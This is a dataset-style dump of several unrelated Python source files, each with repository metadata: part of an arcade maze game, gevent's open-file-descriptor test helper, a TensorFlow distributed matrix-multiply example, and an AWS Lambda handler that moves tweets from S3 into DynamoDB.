for x in (0, SCREEN_WIDTH - SPRITE_SIZE):
# Loop for each box going across
for y in range(SPRITE_SIZE, SCREEN_HEIGHT - SPRITE_SIZE, SPRITE_SIZE):
# Skip making a block 4 and 5 blocks up
if (y != SPRITE_SIZE * 4 and y != SPRITE_SIZE * 5) or x != 0:
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = x
wall.bottom = y
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 1 * SPRITE_SIZE
wall.bottom = 6 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 1 * SPRITE_SIZE
wall.bottom = 3 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 2 * SPRITE_SIZE
wall.bottom = 5.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 2 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 3 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 4 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 4 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 2 * SPRITE_SIZE
wall.bottom = 5.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 2 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 3 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 4 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 5 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 5.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 4 * SPRITE_SIZE
wall.bottom = 2.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom =3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 0.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 7 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 7 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 9 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 2.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 5.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 9 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 7.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 8 * SPRITE_SIZE
room.wall_list.append(wall)
room.background = arcade.load_texture("g.png")
bigpotion = arcade.Sprite("small.png",0.05)
bigpotion.center_x = 800
bigpotion.center_y = 100
room.bigpotion_list.append(bigpotion)
return room
class MyGame(arcade.Window):
""" Main application class. """
def __init__(self, width, height):
"""
Initializer
"""
super().__init__(width, height,"Tocate el pnnywise")
# Set the working directory (where we expect to find files) to the same
# directory this .py file is in. You can leave this out of your own
# code, but it is needed to easily run the examples using "python -m"
# as mentioned at the top of this program.
file_path = os.path.dirname(os.path.abspath(__file__))
os.chdir(file_path)
# Sprite lists
self.current_room = 0
# Set up the player
self.game_over = False
self.door_list = None
self.rooms = None
self.score = 0
self.coin_list = None
self.player_sprite = None
self.physics_engine = None
self.smallpotion_list = None
self.bigpotion_list = None
def setup(self):
""" Set up the game and initialize the variables. """
# Set up the player
self.player_sprite = arcade.AnimatedWalkingSprite()
self.score = 0
self.coin_list = arcade.SpriteList()
self.smallpotion_list = arcade.SpriteList()
self.bigpotion_list = arcade.SpriteList()
self.player_sprite.center_x = 100
self.player_sprite.center_y = 150
character_scale = 0.75
self.player_sprite.stand_right_textures = []
self.player_sprite.stand_right_textures.append(arcade.load_texture("zombie_stand.png",
scale=character_scale))
self.player_sprite.stand_left_textures = []
self.player_sprite.stand_left_textures.append(arcade.load_texture("zombie_stand.png",
scale=character_scale, mirrored=True))
self.player_sprite.walk_right_textures = []
self.player_sprite.walk_right_textures.append(arcade.load_texture("zombie_walk1.png",
scale=character_scale))
self.player_sprite.walk_right_textures.append(arcade.load_texture("zombie_walk2.png",
scale=character_scale))
self.player_sprite.walk_left_textures = []
self.player_sprite.walk_left_textures.append(arcade.load_texture("zombie_walk1.png",
scale=character_scale, mirrored=True))
self.player_sprite.walk_left_textures.append(arcade.load_texture("zombie_walk2.png",
scale=character_scale, mirrored=True))
# Our list of rooms
self.rooms = []
# Create the rooms. Extend the pattern for each room.
room = setup_room_1()
self.rooms.append(room)
room = setup_room_2()
self.rooms.append(room)
# Our starting room number
self.current_room = 0
# Create a physics engine for this room
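# Note: the two assignments below both bind self.physics_engine, so the second one
# (door_list) replaces the first and only door collisions are enforced until
# update() rebuilds the engine with wall_list on a room change.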
self.physics_engine = arcade.PhysicsEngineSimple(self.player_sprite, self.rooms[self.current_room].wall_list)
self.physics_engine = arcade.PhysicsEngineSimple(self.player_sprite, self.rooms[self.current_room].door_list)
def on_draw(self):
"""
Render the screen.
"""
# This command has to happen before we start drawing
arcade.start_render()
# Draw the background texture
arcade.draw_texture_rectangle(SCREEN_WIDTH // 2, SCREEN_HEIGHT // 2,
SCREEN_WIDTH, SCREEN_HEIGHT, self.rooms[self.current_room].background)
# Draw all the walls in this room
self.rooms[self.current_room].door_list.draw()
self.rooms[self.current_room].wall_list.draw()
self.rooms[self.current_room].coin_list.draw()
self.rooms[self.current_room].bigpotion_list.draw()
self.rooms[self.current_room].smallpotion_list.draw()
# If you have coins or monsters, then copy and modify the line
# above for each list.
output = "Score: {}".format(self.score)
arcade.draw_text(output, 10, 20, arcade.color.WHITE, 14)
self.player_sprite.draw()
def on_key_press(self, key, modifiers):
"""Called whenever a key is pressed. """
if key == arcade.key.W:
self.player_sprite.change_y = MOVEMENT_SPEED
elif key == arcade.key.S:
self.player_sprite.change_y = -MOVEMENT_SPEED
elif key == arcade.key.A:
self.player_sprite.change_x = -MOVEMENT_SPEED
elif key == arcade.key.D:
self.player_sprite.change_x = MOVEMENT_SPEED
def on_key_release(self, key, modifiers):
"""Called when the user releases a key. """
if key == arcade.key.W or key == arcade.key.S:
self.player_sprite.change_y = 0
elif key == arcade.key.A or key == arcade.key.D:
self.player_sprite.change_x = 0
def update(self, delta_time):
""" Movement and game logic """
self.player_sprite.update_animation()
# Call update on all sprites (The sprites don't do much in this
# example though.)
self.physics_engine.update()
# Do some logic here to figure out what room we are in, and if we need to go
# to a different room.
if self.player_sprite.center_x > SCREEN_WIDTH and self.current_room == 0:
self.current_room = 1
self.physics_engine = arcade.PhysicsEngineSimple(self.player_sprite,
self.rooms[self.current_room].wall_list)
self.player_sprite.center_x = 0
elif self.player_sprite.center_x < 0 and self.current_room == 1:
self.current_room = 0
self.physics_engine = arcade.PhysicsEngineSimple(self.player_sprite,
self.rooms[self.current_room].wall_list)
self.player_sprite.center_x = SCREEN_WIDTH
hit_list = arcade.check_for_collision_with_list(self.player_sprite,self.rooms[self.current_room].coin_list)
hit_list2 = arcade.check_for_collision_with_list(self.player_sprite,self.rooms[self.current_room].bigpotion_list)
hit_list3 = arcade.check_for_collision_with_list(self.player_sprite,self.rooms[self.current_room].smallpotion_list)
for coin in hit_list:
coin.kill()
self.score += 1
my_sound = arcade.load_sound("coinsound.wav")
arcade.play_sound(my_sound)
if self.score == 4:
for i in self.rooms[self.current_room].door_list:
i.kill()
your_sound = arcade.load_sound("door.wav")
arcade.play_sound(your_sound)
for smallpotion in hit_list3:
smallpotion.kill()
self.player_sprite.scale=0.5
tu_sound = arcade.load_sound("shrink.wav")
arcade.play_sound(tu_sound)
for bigpotion in hit_list2:
bigpotion.kill()
self.player_sprite.scale=1
yo_sound = arcade.load_sound("grow.wav")
arcade.play_sound(yo_sound)
def main():
""" Main method """
window = MyGame(SCREEN_WIDTH, SCREEN_HEIGHT)
window.setup()
arcade.run()
if __name__ == "__main__":
main() | en | 0.891822 | This class holds all the information about the
different rooms. # You may want many lists. Lists for coins, monsters, etc. # This holds the background images. If you don't want changing # background images, you can delete this part. Create and return room 1.
If your program gets large, you may want to separate this into different
files. Set up the game and initialize the variables. # Sprite lists # Loop for each box going across # Create left and right column of boxes # Loop for each box going across # Skip making a block 4 and 5 blocks up on the right side # Loop for each box going across # If you want coins or monsters in a level, then add that code here. # Load the background image for this level. Create and return room 2. Set up the game and initialize the variables. # Sprite lists # -- Set up the walls # Create bottom and top row of boxes # This y loops a list of two, the coordinate 0, and just under the top of window # Loop for each box going across # Create left and right column of boxes # Loop for each box going across # Skip making a block 4 and 5 blocks up Main application class. Initializer # Set the working directory (where we expect to find files) to the same # directory this .py file is in. You can leave this out of your own # code, but it is needed to easily run the examples using "python -m" # as mentioned at the top of this program. # Sprite lists # Set up the player Set up the game and initialize the variables. # Set up the player # Our list of rooms # Create the rooms. Extend the pattern for each room. # Our starting room number # Create a physics engine for this room Render the screen. # This command has to happen before we start drawing # Draw the background texture # Draw all the walls in this room # If you have coins or monsters, then copy and modify the line # above for each list. Called whenever a key is pressed. Called when the user releases a key. Movement and game logic # Call update on all sprites (The sprites don't do much in this # example though.) # Do some logic here to figure out what room we are in, and if we need to go # to a different room. Main method | 3.671239 | 4 |
venv/lib/python3.6/site-packages/gevent/testing/openfiles.py | Guillaume-Fernandez/phishfinder | 10 | 8038 | # Copyright (c) 2018 gevent community
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from __future__ import absolute_import, print_function, division
import os
import unittest
import re
from . import sysinfo
# Linux/OS X/BSD platforms can implement this by calling out to lsof
if sysinfo.WIN:
def _run_lsof():
raise unittest.SkipTest("lsof not expected on Windows")
else:
def _run_lsof():
import tempfile
pid = os.getpid()
fd, tmpname = tempfile.mkstemp('get_open_files')
os.close(fd)
lsof_command = 'lsof -p %s > %s' % (pid, tmpname)
if os.system(lsof_command):
# XXX: This prints to the console an annoying message: 'lsof is not recognized'
raise unittest.SkipTest("lsof failed")
with open(tmpname) as fobj:
data = fobj.read().strip()
os.remove(tmpname)
return data
def default_get_open_files(pipes=False):
data = _run_lsof()
results = {}
for line in data.split('\n'):
line = line.strip()
if not line or line.startswith("COMMAND"):
# Skip header and blank lines
continue
split = re.split(r'\s+', line)
_command, _pid, _user, fd = split[:4]
# Pipes (on OS X, at least) get an fd like "3" while normal files get an fd like "1u"
if fd[:-1].isdigit() or fd.isdigit():
if not pipes and fd[-1].isdigit():
continue
fd = int(fd[:-1]) if not fd[-1].isdigit() else int(fd)
if fd in results:
params = (fd, line, split, results.get(fd), data)
raise AssertionError('error when parsing lsof output: duplicate fd=%r\nline=%r\nsplit=%r\nprevious=%r\ndata:\n%s' % params)
results[fd] = line
if not results:
raise AssertionError('failed to parse lsof:\n%s' % (data, ))
results['data'] = data
return results
def default_get_number_open_files():
if os.path.exists('/proc/'):
# Linux only
fd_directory = '/proc/%d/fd' % os.getpid()
return len(os.listdir(fd_directory))
try:
return len(get_open_files(pipes=True)) - 1
except (OSError, AssertionError, unittest.SkipTest):
return 0
lsof_get_open_files = default_get_open_files
try:
# psutil import subprocess which on Python 3 imports selectors.
# This can expose issues with monkey-patching.
import psutil
except ImportError:
get_open_files = default_get_open_files
get_number_open_files = default_get_number_open_files
else:
# If psutil is available (it is cross-platform) use that.
# It is *much* faster than shelling out to lsof each time
# (Running 14 tests takes 3.964s with lsof and 0.046 with psutil)
# However, it still doesn't completely solve the issue on Windows: fds are reported
# as -1 there, so we can't fully check those.
def get_open_files():
"""
Return a list of popenfile and pconn objects.
Note that other than `fd`, they have different attributes.
.. important:: If you want to find open sockets, on Windows
and linux, it is important that the socket at least be listening
(socket.listen(1)). Unlike the lsof implementation, this will only
return sockets in a state like that.
"""
results = dict()
process = psutil.Process()
results['data'] = process.open_files() + process.connections('all')
for x in results['data']:
results[x.fd] = x
results['data'] += ['From psutil', process]
return results
def get_number_open_files():
process = psutil.Process()
try:
return process.num_fds()
except AttributeError:
# num_fds is unix only. Is num_handles close enough on Windows?
return 0
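# Illustrative self-check (an assumption, not part of the gevent helpers): running this
# module directly prints the current descriptor count and the parsed table, using only
# get_number_open_files() and get_open_files() defined above.
if __name__ == '__main__':
    print("open file descriptors:", get_number_open_files())
    _open = get_open_files()
    for _fd in sorted(k for k in _open if k != 'data'):
        print(_fd, _open[_fd])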
| # Copyright (c) 2018 gevent community
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from __future__ import absolute_import, print_function, division
import os
import unittest
import re
from . import sysinfo
# Linux/OS X/BSD platforms can implement this by calling out to lsof
if sysinfo.WIN:
def _run_lsof():
raise unittest.SkipTest("lsof not expected on Windows")
else:
def _run_lsof():
import tempfile
pid = os.getpid()
fd, tmpname = tempfile.mkstemp('get_open_files')
os.close(fd)
lsof_command = 'lsof -p %s > %s' % (pid, tmpname)
if os.system(lsof_command):
# XXX: This prints to the console an annoying message: 'lsof is not recognized'
raise unittest.SkipTest("lsof failed")
with open(tmpname) as fobj:
data = fobj.read().strip()
os.remove(tmpname)
return data
def default_get_open_files(pipes=False):
data = _run_lsof()
results = {}
for line in data.split('\n'):
line = line.strip()
if not line or line.startswith("COMMAND"):
# Skip header and blank lines
continue
split = re.split(r'\s+', line)
_command, _pid, _user, fd = split[:4]
# Pipes (on OS X, at least) get an fd like "3" while normal files get an fd like "1u"
if fd[:-1].isdigit() or fd.isdigit():
if not pipes and fd[-1].isdigit():
continue
fd = int(fd[:-1]) if not fd[-1].isdigit() else int(fd)
if fd in results:
params = (fd, line, split, results.get(fd), data)
raise AssertionError('error when parsing lsof output: duplicate fd=%r\nline=%r\nsplit=%r\nprevious=%r\ndata:\n%s' % params)
results[fd] = line
if not results:
raise AssertionError('failed to parse lsof:\n%s' % (data, ))
results['data'] = data
return results
def default_get_number_open_files():
if os.path.exists('/proc/'):
# Linux only
fd_directory = '/proc/%d/fd' % os.getpid()
return len(os.listdir(fd_directory))
try:
return len(get_open_files(pipes=True)) - 1
except (OSError, AssertionError, unittest.SkipTest):
return 0
lsof_get_open_files = default_get_open_files
try:
# psutil import subprocess which on Python 3 imports selectors.
# This can expose issues with monkey-patching.
import psutil
except ImportError:
get_open_files = default_get_open_files
get_number_open_files = default_get_number_open_files
else:
# If psutil is available (it is cross-platform) use that.
# It is *much* faster than shelling out to lsof each time
# (Running 14 tests takes 3.964s with lsof and 0.046 with psutil)
# However, it still doesn't completely solve the issue on Windows: fds are reported
# as -1 there, so we can't fully check those.
def get_open_files():
"""
Return a list of popenfile and pconn objects.
Note that other than `fd`, they have different attributes.
.. important:: If you want to find open sockets, on Windows
and linux, it is important that the socket at least be listening
(socket.listen(1)). Unlike the lsof implementation, this will only
return sockets in a state like that.
"""
results = dict()
process = psutil.Process()
results['data'] = process.open_files() + process.connections('all')
for x in results['data']:
results[x.fd] = x
results['data'] += ['From psutil', process]
return results
def get_number_open_files():
process = psutil.Process()
try:
return process.num_fds()
except AttributeError:
# num_fds is unix only. Is num_handles close enough on Windows?
return 0
| en | 0.858515 | # Copyright (c) 2018 gevent community # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # Linux/OS X/BSD platforms can implement this by calling out to lsof # XXX: This prints to the console an annoying message: 'lsof is not recognized' # Skip header and blank lines # Pipes (on OS X, at least) get an fd like "3" while normal files get an fd like "1u" # Linux only # psutil import subprocess which on Python 3 imports selectors. # This can expose issues with monkey-patching. # If psutil is available (it is cross-platform) use that. # It is *much* faster than shelling out to lsof each time # (Running 14 tests takes 3.964s with lsof and 0.046 with psutil) # However, it still doesn't completely solve the issue on Windows: fds are reported # as -1 there, so we can't fully check those. Return a list of popenfile and pconn objects. Note that other than `fd`, they have different attributes. .. important:: If you want to find open sockets, on Windows and linux, it is important that the socket at least be listening (socket.listen(1)). Unlike the lsof implementation, this will only return sockets in a state like that. # num_fds is unix only. Is num_handles close enough on Windows? | 2.048503 | 2 |
examples/multiprocess_example.py | ct-clmsn/distributed-tensorflow-orchestration | 5 | 8039 | <gh_stars>1-10
'''
marathon_example.py
performs a simple matrix multiply using 3 compute nodes
'''
import argparse
import uuid
def parseargs():
parser = argparse.ArgumentParser(description='Marathon for TensorFlow.')
parser.add_argument('--n_tasks', default=1, help='an integer for the accumulator')
parser.add_argument('--cpu', default=100.0, help='an integer for the accumulator')
parser.add_argument('--mem', default=100.0, help='an integer for the accumulator')
parser.add_argument('--taskname', default=uuid.uuid1(), help='name for the task')
parser.add_argument('--url', help='DNS addr to marathon')
parser.add_argument('--usr', help='marathon username')
parser.add_argument('--usrpwd', help='marathon password')
parser.add_argument('--uri', help='curl-friendly URI to the tensorflow client executable (url?, hdfs?, docker?)')
args = parser.parse_args()
return args
if __name__ == '__main__':
from sys import argv
import tensorflow as tf
from dtforchestrator import *
args = parseargs()
with MultiprocessTensorFlowSession(args.taskname, args.n_tasks) as tfdevices:
with tf.device(tfdevices.getDeviceSpec(1)):
matrix1 = tf.constant([[3.],[3.]])
with tf.device(tfdevices.getDeviceSpec(2)):
matrix2 = tf.constant([[3.,3.]])
with tf.device(tfdevices.getDeviceSpec(0)):
matrix0 = tf.constant([[3.,3.]])
product1 = tf.matmul(matrix0, matrix1)
product2 = tf.matmul(matrix2, matrix1)
with tf.Session(tfdevices.localGRPC()) as sess:
res = sess.run(product1)
print res
res = sess.run(product2)
print res
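# Expected output as a quick sanity check (assuming the constants above): each product
# multiplies a 1x2 row of 3s by a 2x1 column of 3s, so both sess.run() calls print a
# 1x1 matrix whose single entry is 3*3 + 3*3 = 18, i.e. [[ 18.]].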
| '''
marathon_example.py
performs a simple matrix multiply using 3 compute nodes
'''
import argparse
import uuid
def parseargs():
parser = argparse.ArgumentParser(description='Marathon for TensorFlow.')
parser.add_argument('--n_tasks', default=1, help='an integer for the accumulator')
parser.add_argument('--cpu', default=100.0, help='an integer for the accumulator')
parser.add_argument('--mem', default=100.0, help='an integer for the accumulator')
parser.add_argument('--taskname', default=uuid.uuid1(), help='name for the task')
parser.add_argument('--url', help='DNS addr to marathon')
parser.add_argument('--usr', help='marathon username')
parser.add_argument('--usrpwd', help='marathon password')
parser.add_argument('--uri', help='curl-friendly URI to the tensorflow client executable (url?, hdfs?, docker?)')
args = parser.parse_args()
return args
if __name__ == '__main__':
from sys import argv
import tensorflow as tf
from dtforchestrator import *
args = parseargs()
with MultiprocessTensorFlowSession(args.taskname, args.n_tasks) as tfdevices:
with tf.device(tfdevices.getDeviceSpec(1)):
matrix1 = tf.constant([[3.],[3.]])
with tf.device(tfdevices.getDeviceSpec(2)):
matrix2 = tf.constant([[3.,3.]])
with tf.device(tfdevices.getDeviceSpec(0)):
matrix0 = tf.constant([[3.,3.]])
product1 = tf.matmul(matrix0, matrix1)
product2 = tf.matmul(matrix2, matrix1)
with tf.Session(tfdevices.localGRPC()) as sess:
res = sess.run(product1)
print res
res = sess.run(product2)
print res | en | 0.490669 | marathon_example.py performs a simple matrix multiply using 3 compute nodes | 2.453282 | 2 |
FAUCovidCrawler/AWSLambda/lambda_function.py | Awannaphasch2016/CDKFAUCovid19Cralwer | 0 | 8040 | <reponame>Awannaphasch2016/CDKFAUCovid19Cralwer
'''
Original code contributor: mentzera
Article link: https://aws.amazon.com/blogs/big-data/building-a-near-real-time-discovery-platform-with-aws/
'''
import boto3
import json
import twitter_to_es
# from Examples.Demo.AWS_Related.TwitterStreamWithAWS.LambdaWithS3Trigger import \
# twitter_to_es
from tweet_utils import \
get_tweet, id_field, get_tweet_mapping
headers = {"Content-Type": "application/json"}
s3 = boto3.client('s3')
kinesis_client = boto3.client('kinesis')
# dynamoDb_client = boto3.client('dynamodb')
# Lambda execution starts here
def handler(event, context):
for record in event['Records']:
# Get the bucket name and key for the new file
bucket = record['s3']['bucket']['name']
key = record['s3']['object']['key']
# Get s3 object, read, and split the file into lines
try:
obj = s3.get_object(Bucket=bucket, Key=key)
except Exception as e:
print(e)
print(
'Error getting object {} from bucket {}. Make sure they exist and your bucket is in the same region as this function.'.format(
key, bucket))
raise e
# Parse s3 object content (JSON)
try:
# https://stackoverflow.com/questions/31976273/open-s3-object-as-a-string-with-boto3
s3_file_content = obj['Body'].read().decode('utf-8')
# clean trailing comma
if s3_file_content.endswith(',\n'):
s3_file_content = s3_file_content[:-2]
tweets_str = '[' + s3_file_content + ']'
# print(tweets_str)
tweets = json.loads(tweets_str)
except Exception as e:
print(e)
print('Error loading json from object {} in bucket {}'.format(key,
bucket))
raise e
for doc in tweets:
tweet = get_tweet(doc)
# print(tweet['sentiments'])
print(tweet)
print('===\n\n\n')
#=====================
#==send data to dynamoDB
#=====================
# Get the service resource.
dynamodb = boto3.resource('dynamodb')
# Instantiate a table resource object without actually
# creating a DynamoDB table. Note that the attributes of this table
# are lazy-loaded: a request is not made nor are the attribute
# values populated until the attributes
# on the table resource are accessed or its load() method is called.
table = dynamodb.Table('faucovidstream_twitter_with_sentiment')
# Print out some data about the table.
# This will cause a request to be made to DynamoDB and its attribute
# values will be set based on the response.
print(table.creation_date_time)
# put_item is exposed on the Table resource, not on the service resource
table.put_item(
Item=tweet
)
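# Optional variant (a sketch, not in the original handler): when a file holds many
# tweets, DynamoDB writes can be batched with a batch_writer instead of one
# put_item per record; the table name and get_tweet() are reused from above.
def _store_tweets_batched(tweets):
    dynamodb = boto3.resource('dynamodb')
    table = dynamodb.Table('faucovidstream_twitter_with_sentiment')
    with table.batch_writer() as batch:
        for doc in tweets:
            batch.put_item(Item=get_tweet(doc))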
| '''
Original code contributor: mentzera
Article link: https://aws.amazon.com/blogs/big-data/building-a-near-real-time-discovery-platform-with-aws/
'''
import boto3
import json
import twitter_to_es
# from Examples.Demo.AWS_Related.TwitterStreamWithAWS.LambdaWithS3Trigger import \
# twitter_to_es
from tweet_utils import \
get_tweet, id_field, get_tweet_mapping
headers = {"Content-Type": "application/json"}
s3 = boto3.client('s3')
kinesis_client = boto3.client('kinesis')
# dynamoDb_client = boto3.client('dynamodb')
# Lambda execution starts here
def handler(event, context):
for record in event['Records']:
# Get the bucket name and key for the new file
bucket = record['s3']['bucket']['name']
key = record['s3']['object']['key']
# Get s3 object, read, and split the file into lines
try:
obj = s3.get_object(Bucket=bucket, Key=key)
except Exception as e:
print(e)
print(
'Error getting object {} from bucket {}. Make sure they exist and your bucket is in the same region as this function.'.format(
key, bucket))
raise e
# Parse s3 object content (JSON)
try:
# https://stackoverflow.com/questions/31976273/open-s3-object-as-a-string-with-boto3
s3_file_content = obj['Body'].read().decode('utf-8')
# clean trailing comma
if s3_file_content.endswith(',\n'):
s3_file_content = s3_file_content[:-2]
tweets_str = '[' + s3_file_content + ']'
# print(tweets_str)
tweets = json.loads(tweets_str)
except Exception as e:
print(e)
print('Error loading json from object {} in bucket {}'.format(key,
bucket))
raise e
for doc in tweets:
tweet = get_tweet(doc)
# print(tweet['sentiments'])
print(tweet)
print('===\n\n\n')
#=====================
#==send data to dynamoDB
#=====================
